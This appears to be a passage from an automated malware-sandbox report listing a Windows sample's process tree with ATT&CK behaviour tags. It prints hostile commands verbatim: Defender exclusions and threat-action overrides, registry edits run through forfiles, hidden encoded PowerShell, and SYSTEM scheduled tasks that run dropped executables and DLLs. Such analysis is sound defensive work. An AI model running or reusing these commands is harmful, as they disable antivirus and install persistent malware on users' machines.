                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:716
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GYmJCxEerPSU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GYmJCxEerPSU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\loHBtvqqmsAxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\loHBtvqqmsAxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tKcYsXlQRPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tKcYsXlQRPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wmPxOgfbU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wmPxOgfbU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zWoVZpynlBkRPCWXAOR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zWoVZpynlBkRPCWXAOR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RmigOdwjAYMpEGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RmigOdwjAYMpEGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\hAYiJMxfiUrgBEHMZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\hAYiJMxfiUrgBEHMZ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TRULmzvUdchjVCAU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\TRULmzvUdchjVCAU\" /t REG_DWORD /d 0 /reg:64;"
                                                      2⤵
                                                      • Drops file in System32 directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2556
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GYmJCxEerPSU2" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3544
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GYmJCxEerPSU2" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2800
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GYmJCxEerPSU2" /t REG_DWORD /d 0 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1568
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\loHBtvqqmsAxC" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5028
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\loHBtvqqmsAxC" /t REG_DWORD /d 0 /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3292
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tKcYsXlQRPUn" /t REG_DWORD /d 0 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5092
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tKcYsXlQRPUn" /t REG_DWORD /d 0 /reg:64
                                                        3⤵
                                                          PID:4744
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmPxOgfbU" /t REG_DWORD /d 0 /reg:32
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3676
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wmPxOgfbU" /t REG_DWORD /d 0 /reg:64
                                                          3⤵
                                                            PID:1912
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWoVZpynlBkRPCWXAOR" /t REG_DWORD /d 0 /reg:32
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3632
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWoVZpynlBkRPCWXAOR" /t REG_DWORD /d 0 /reg:64
                                                            3⤵
                                                              PID:1224
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RmigOdwjAYMpEGVB /t REG_DWORD /d 0 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3036
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RmigOdwjAYMpEGVB /t REG_DWORD /d 0 /reg:64
                                                              3⤵
                                                                PID:3780
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3112
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                3⤵
                                                                  PID:1736
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3704
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:5076
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\hAYiJMxfiUrgBEHMZ /t REG_DWORD /d 0 /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4748
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\hAYiJMxfiUrgBEHMZ /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                    PID:4668
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TRULmzvUdchjVCAU /t REG_DWORD /d 0 /reg:32
                                                                    3⤵
                                                                      PID:4804
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\TRULmzvUdchjVCAU /t REG_DWORD /d 0 /reg:64
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3488
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /CREATE /TN "glqlXCKwb" /SC once /ST 15:48:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                    2⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:2540
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    schtasks /run /I /tn "glqlXCKwb"
                                                                    2⤵
                                                                      PID:2456
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      schtasks /DELETE /F /TN "glqlXCKwb"
                                                                      2⤵
                                                                        PID:4124
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "GIkSVIuYivoLmyrCN" /SC once /ST 03:01:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TRULmzvUdchjVCAU\cUQMCAEvqTJwwPn\KSaYDWQ.exe\" Iu /QglldidmQ 525403 /S" /V1 /F
                                                                        2⤵
                                                                        • Drops file in Windows directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:1208
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "GIkSVIuYivoLmyrCN"
                                                                        2⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2868
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 1060
                                                                        2⤵
                                                                        • Program crash
                                                                        PID:3028
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                      1⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3268
                                                                      • C:\Windows\system32\gpupdate.exe
                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                        2⤵
                                                                          PID:2128
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                        1⤵
                                                                          PID:1852
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                          1⤵
                                                                            PID:2912
                                                                          • C:\Windows\system32\gpscript.exe
                                                                            gpscript.exe /RefreshSystemParam
                                                                            1⤵
                                                                              PID:1764
                                                                            • C:\Windows\Temp\TRULmzvUdchjVCAU\cUQMCAEvqTJwwPn\KSaYDWQ.exe
                                                                              C:\Windows\Temp\TRULmzvUdchjVCAU\cUQMCAEvqTJwwPn\KSaYDWQ.exe Iu /QglldidmQ 525403 /S
                                                                              1⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Drops Chrome extension
                                                                              • Drops file in System32 directory
                                                                              • Drops file in Program Files directory
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2252
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                2⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4596
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                  3⤵
                                                                                  • Indirect Command Execution
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4352
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                    4⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2996
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                        PID:3744
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                    3⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:2752
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                      4⤵
                                                                                        PID:1868
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                          5⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:888
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                      3⤵
                                                                                      • Indirect Command Execution
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:3164
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                        4⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1148
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                          5⤵
                                                                                            PID:4424
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                        3⤵
                                                                                        • Indirect Command Execution
                                                                                        PID:1504
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          4⤵
                                                                                            PID:2120
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                              5⤵
                                                                                                PID:3608
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            3⤵
                                                                                            • Indirect Command Execution
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4520
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                              4⤵
                                                                                                PID:2988
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops file in System32 directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2852
                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                    6⤵
                                                                                                      PID:4744
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "bMXUrtIxrZqSFMYNFL"
                                                                                              2⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:3472
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                              2⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:992
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                3⤵
                                                                                                • Indirect Command Execution
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3488
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  4⤵
                                                                                                    PID:4980
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      5⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1320
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        6⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3960
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wmPxOgfbU\RfOjJE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "bBmaTEDfqMcLOKr" /V1 /F
                                                                                                2⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:4752
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "bBmaTEDfqMcLOKr2" /F /xml "C:\Program Files (x86)\wmPxOgfbU\XPHVXjy.xml" /RU "SYSTEM"
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:4568
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /END /TN "bBmaTEDfqMcLOKr"
                                                                                                2⤵
                                                                                                  PID:2776
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "bBmaTEDfqMcLOKr"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3132
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "fLSbuuowcEgpXf" /F /xml "C:\Program Files (x86)\GYmJCxEerPSU2\FYQPGZH.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:4348
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "aGogCceXIZVGT2" /F /xml "C:\ProgramData\RmigOdwjAYMpEGVB\XSOptqx.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2284
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "McbMYYUJCZrlryhGz2" /F /xml "C:\Program Files (x86)\zWoVZpynlBkRPCWXAOR\UOpBSjA.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:400
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "blfjsxgIcEOhisiUiQv2" /F /xml "C:\Program Files (x86)\loHBtvqqmsAxC\flatNLV.xml" /RU "SYSTEM"
                                                                                                  2⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2844
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "ASiPpAPevJZeJjpmZ" /SC once /ST 10:15:04 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TRULmzvUdchjVCAU\LhaBxKIr\iRAZDtW.dll\",#1 /ECqdidm 525403" /V1 /F
                                                                                                  2⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:2952
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /run /I /tn "ASiPpAPevJZeJjpmZ"
                                                                                                  2⤵
                                                                                                    PID:3308
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /DELETE /F /TN "GIkSVIuYivoLmyrCN"
                                                                                                    2⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2520
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2252 -s 2376
                                                                                                    2⤵
                                                                                                    • Program crash
                                                                                                    PID:3028
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1820 -ip 1820
                                                                                                  1⤵
                                                                                                    PID:5032
                                                                                                  • C:\Windows\system32\rundll32.EXE
                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TRULmzvUdchjVCAU\LhaBxKIr\iRAZDtW.dll",#1 /ECqdidm 525403
                                                                                                    1⤵
                                                                                                      PID:2568
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TRULmzvUdchjVCAU\LhaBxKIr\iRAZDtW.dll",#1 /ECqdidm 525403
                                                                                                        2⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Loads dropped DLL
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Enumerates system info in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:2700
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "ASiPpAPevJZeJjpmZ"
                                                                                                          3⤵
                                                                                                            PID:2996
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2308 -ip 2308
                                                                                                        1⤵
                                                                                                          PID:1508
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2252 -ip 2252
                                                                                                          1⤵
                                                                                                            PID:1132

                                                                                                          Network

                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

